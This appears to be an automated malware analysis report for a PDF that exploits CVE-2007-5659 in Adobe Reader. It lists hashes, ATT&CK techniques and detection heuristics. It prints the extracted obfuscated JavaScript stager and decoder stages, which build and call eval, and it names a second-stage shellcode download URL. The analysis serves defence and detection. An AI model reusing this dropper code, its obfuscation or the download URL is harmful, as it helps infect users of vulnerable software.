Malicious PDF — malware analysis report

Static analysis result for SHA-256 68d561aaaf0e48fb…

MALICIOUS

PDF

17.2 KB
MD5: 9274b99ea0a37fa8fbbdfadf7ed1c0a9
SHA-1: a62bb7c05469ba6fa0745b45a805e18ec561c68a
SHA-256: 68d561aaaf0e48fb1de128918c7b82e22e07795b80adb355bb165cc0f83c43b2
Risk Score: 406

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript
  • T1105 Ingress Tool Transfer

This PDF file contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed as a multi-stage dropper, first decoding a payload from an annotation subject and then executing it. The decoded payload contains a URL, http://aiosstatsungenett.com/info/nag3.html/n002106204Xea1b012dY6802170f, which is used to download a second-stage shellcode.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics 11

  • Collab.collectEmailInfo — CVE-2007-5659 critical CVE exact CVE_2007_5659
    PDF JavaScript calls Collab.collectEmailInfo — CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by a long argument or heap-sprayed message field passed to Collab.collectEmailInfo(). Part of a series of Acrobat JS API exploits. (identified after JavaScript deobfuscation)
  • JavaScript action low 5 related findings PDF_JAVASCRIPT
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) high CVE likely PDF_JS_ADOBE_APSB08_13_PATCH_GATE
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1) — the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper high PDF_JS_OBFUSCATED_DROPPER
    PDF JavaScript shows 4 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers — OpenAction JS reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (method name built one character at a time). The actual CVE is hidden in the final decoded layer and is not visible via static analysis.
  • PDF JavaScript shellcode contains an embedded download URL high PDF_JS_SHELLCODE_DOWNLOAD_URL
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream low PDF_JS
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901
  • Annotation subject callee-key hex JavaScript stager high PDF_ANNOT_SUBJECT_CALLEE_HEX_STAGER
    PDF JavaScript uses syncAnnotScan()/getAnnots() to read an indirect annotation /Subject stream, percent-decodes it through marker replacement, then uses a callee.toString()-derived key to decode and eval the final exploit stage.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://aiosstatsungenett.com/info/nag3.html/n002106204Xea1b012dY6802170f Referenced by PDF JavaScript

Extracted artifacts 5

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
javascript_obj0009_000.js
4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
pdf-javascript-stream PDF /JS object 9 at offset 0x4281 469 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 1 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}
annotation_subject_callee_hex_stage_000.js
ae434026830945dd99a1aecbfb058f42f45d10904ffdee367da9807c876774d5
deobfuscated-js annotation-subject callee-key decoded JavaScript at offset 0x1A70 5286 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 5 eval/decoder/string-building token(s).
Preview script
First 1,000 lines of the extracted script
... (truncated)
legacy_pdfkit_stage_000.js
fa7bc6727745f32b3c212aa2c60c0ed69fc3124b4c44246a9601e44e0fbf74a6
deobfuscated-js repeated-marker hex decoded JavaScript at offset 0x1AC4 11918 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 2 eval/decoder/string-building token(s). Carved artifact contains 1 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
function EUj_____C_G(s6Yj_t2I__B, y_fkF__GO8qtXsh){var C6k_hHe4QrRBeI5 = 512;var BI_8O_n = 2;var Jued_w6_E_84d5 = 0;var BY_x__R8_O8a = 0;var NdF_R5n23_e5 = "";var sog__a = "";var DcaAXT6_Lr_kn = 0;var YV_I46_Hq = 6 + 1;try {var s___01sLKAvc = 0;if (app) {BY_x__R8_O8a = BY_x__R8_O8a + 2;y_fkF__GO8qtXsh = pr[s___01sLKAvc].subject;}} catch(e) { }BY_x__R8_O8a = BY_x__R8_O8a + 7;var TkSm2w_v = new Array();if (!s6Yj_t2I__B) { TkSm2w_v = new Array(225,243,185,243,11,143);} else {TkSm2w_v = s6Yj_t2I__B;}var X6__R43d = 0;var X5OJT__1Y = 0;var X6a2_Kx = 0;YV_I46_Hq--;if (YV_I46_Hq == 0) {} else {for(X5OJT__1Y = 0; X5OJT__1Y < y_fkF__GO8qtXsh.length; X5OJT__1Y += BI_8O_n) {if (X6__R43d >= YV_I46_Hq) {X6__R43d = 0;}var YWO_2_yVWn = y_fkF__GO8qtXsh.substr(X5OJT__1Y, BI_8O_n) + "YY";var VJd3m7lXjvu = parseInt(YWO_2_yVWn, BI_8O_n + 10 + 9);VJd3m7lXjvu -= TkSm2w_v[X6__R43d] * (X6a2_Kx + BI_8O_n);X6__R43d++;if (VJd3m7lXjvu < 0) {VJd3m7lXjvu = String.fromCharCode(VJd3m7lXjvu - (Math.floor(VJd3m7lXjvu / 256) * 512 / 2));} else {VJd3m7lXjvu = String.fromCharCode(VJd3m7lXjvu);}if (BY_x__R8_O8a == 9) {NdF_R5n23_e5 += VJd3m7lXjvu;} else if (BY_x__R8_O8a == 8) {NdF_R5n23_e5 += xggY5cx_j;} else {if (BY_x__R8_O8a != 9) {NdF_R5n23_e5 += X5OJT__1Y;}}X6a2_Kx++;}}var cP3K_t_4U2 = this;cP3K_t_4U2['ev'+'al'](NdF_R5n23_e5);}
... (truncated)
legacy_pdfkit_stage_001.js
fe43490460d723047c733d47cbb1b509876a4560f4baec60b3e80e3e4589a073
deobfuscated-js nested inline base-23 callee-key decoded JavaScript at offset 0x1AC4 5286 bytes
Preview script
First 1,000 lines of the extracted script
... (truncated)
deobfuscated.js
387fa19d5cbe48f89ad1c8ca44465f0cc0fd3552db11f2faae005931a398fe17
deobfuscated-js PDF JavaScript deobfuscation pass 96036 bytes
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 6 eval/decoder/string-building token(s). Carved artifact contains 3 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
... (truncated)